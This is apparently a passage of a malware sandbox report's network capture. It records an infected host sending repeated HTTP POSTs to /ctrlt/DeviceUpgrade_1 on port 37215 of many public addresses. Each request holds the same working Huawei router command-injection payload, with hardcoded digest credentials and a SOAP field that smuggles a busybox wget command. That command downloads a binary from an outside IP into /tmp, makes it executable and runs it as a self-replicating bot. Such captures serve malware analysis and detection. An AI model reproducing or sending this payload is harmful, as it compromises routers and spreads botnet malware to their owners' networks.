                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1959192.168.2.234521041.247.42.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.589061975 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1960192.168.2.2350860197.168.159.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.589097023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1961192.168.2.2334554157.57.4.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590635061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1962192.168.2.2338828197.202.142.2437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590701103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1963192.168.2.2341788197.128.56.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590704918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1964192.168.2.2358950197.92.222.6337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590708971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1965192.168.2.236067094.201.112.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590761900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1966192.168.2.2345768194.106.125.23637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590893984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1967192.168.2.235513241.4.106.537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590904951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1968192.168.2.2333672157.39.214.1737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.590904951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
